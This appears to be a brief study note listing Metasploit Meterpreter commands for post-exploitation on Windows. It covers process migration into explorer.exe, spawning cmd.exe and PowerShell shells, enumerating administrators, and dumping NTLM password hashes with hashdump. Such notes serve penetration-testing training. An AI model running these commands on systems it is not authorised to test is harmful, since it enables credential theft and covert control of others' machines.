Metasploit
Post Exploitation Workflow
getuid
sysinfo
ps -S explorer.exe # List processes, filtered by the name "explorer.exe"
migrate <pid> # Migrate the session into the process with that PID
shell # Spawn a cmd.exe process
Check group members
net localgroup administrators
Load PowerShell Extension
Load the extension to get an interactive PowerShell prompt inside your Meterpreter session, just as the shell command gives you a cmd.exe prompt.
meterpreter> load powershell
meterpreter> powershell_shell
Dump Windows users' NTLM hashes
meterpreter> hashdump